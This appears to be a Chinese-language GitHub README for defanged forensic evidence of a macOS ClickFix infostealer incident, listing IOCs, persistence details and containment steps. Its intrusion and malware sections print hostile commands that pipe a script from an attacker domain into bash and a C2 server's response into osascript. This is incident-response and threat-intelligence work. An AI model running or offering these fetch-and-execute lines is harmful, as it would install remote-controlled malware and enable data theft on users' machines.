derprofi1313/mac-malware-incident-2026-06-11
GitHub: derprofi1313/mac-malware-incident-2026-06-11
该仓库保存了一起 macOS 恶意软件感染事件的无害化取证证据,包含完整的入侵路径分析、IOC 指标及 SHA-256 完整性校验机制。
Stars: 0 | Forks: 0
# macOS 恶意软件事件 — 2026-06-11
针对 macOS 感染的电子取证(事件响应)。所有文件均已
作无害化处理(`.evidence` / `.removed`)—— **切勿在此执行任何内容。**
## 完整性与安全处理
`SHA256SUMS` 以加密方式绑定了当前的公开证据集。
GitHub-CI 仅检查哈希值、文件模式和符号链接;它
不会执行任何样本,也不会将样本作为构件上传。
```
node scripts/verify-evidence.mjs
```
校验器会在 Git 检出中对规范的 Blob 字节进行哈希处理,从而
避免 Windows 换行符转换导致结果出现偏差。在
没有 `.git` 的导出归档中,它会直接检查现有文件。所有
样本均保持 Git 模式 `100644`,带有无害化的后缀,并被
视为具有潜在敌意。有关私密报告 Secrets、
个人数据或重新激活的基础设施的说明,请参阅
[SECURITY.md](SECURITY.md)。
## 入侵途径
意外执行的命令(社会工程学 / "ClickFix" 骗局):
```
# 请勿执行 — Payload 在 README 中已被故意移除。
bash <<< $(echo "" | base64 -d)
# 解码后:curl -s 'https://jawmockssirddos.digital/script.sh' | bash
```
## 恶意软件类型
macOS Loader / Infostealer:
- **持久化:** LaunchAgent `~/Library/LaunchAgents/com.ywywbbsaidgbgfyz.plist` (RunAtLoad + KeepAlive)
- **C2 伪装 ("EtherHiding"):** 通过公共 RPC 节点从 Polygon 智能合约中读取当前的 C2 地址
- **主动远程控制 (RCE):** `curl https://hf98x4d.site … | osascript` — 服务器响应会被直接执行
- 混淆:嵌套的 base64 + AppleScript `character id` / `ASCII character`
活跃运行时间大约在 2026-06-11 的 10:23–10:33(当地时间)。
## 攻陷指标 (IOCs)
| 类型 | 值 |
|---|---|
| 入侵 URL | `https://jawmockssirddos.digital/script.sh` |
| C2 Beacon | `https://hf98x4d.site` (`POST txid=…&bmodule`) |
| Polygon Dead-Drop 合约 | `0xA3a603F8a454a9c905b4c579Bb72628F7C15C2A0` (data `0x2686ecea`) |
| RPC 解析器 | polygon.drpc.org, polygon.publicnode.com, polygon-mainnet.gateway.tatum.io, tenderly.rpc.polygon.community |
| 活动 ID (txid) | `91bd211a81f2fbb5020a477c9f729782` |
| 持久化 Plist | `com.ywywbbsaidgbgfyz` |
| 标记文件 | `~/.txid`, `~/.passphrase` |
## 遏制措施(已执行)
- 卸载 LaunchAgent (`launchctl bootout`),终止恶意进程(PID 18805/18808/18820/18822)
- 从 `LaunchAgents` 中移除 Plist,转移标记文件 — 所有内容均已在此保全
- 验证完毕:无运行中的恶意进程,Agent 未加载,Shell 配置文件/Cron/LaunchDaemons 干净无异常
## 文件
| 文件 | 内容 |
|---|---|
| `script.sh.evidence` | 原始下载的 `script.sh` |
| `com.ywywbbsaidgbgfyz.plist.evidence` / `.removed` | 持久化 Plist |
| `decoded_agent_applescript.txt` | 解码后的 Agent AppleScript |
| `dot_txid.removed` / `dot_passphrase.removed` | 标记文件 |
| `process_snapshot.txt` / `launchctl_snapshot.txt` | 感染发生时的进程/launchctl 状态 |
## 发布限制
这些文件仅记录了这起特定事件,并非完整的
恶意软件家族分析。域名、钱包/合约数据以及活动 ID
可能在取证后被修改、停用或重新分配。因此,在投入实际应用前,请通过最新的 Threat-Intelligence 来源对这些 IOC 进行验证。
标签:DAST, DNS 反向解析, MITM代理, 威胁情报, 安全样本, 库, 应急响应, 开发者工具, 恶意软件分析, 数字取证, 网络信息收集, 自动化脚本, 自定义脚本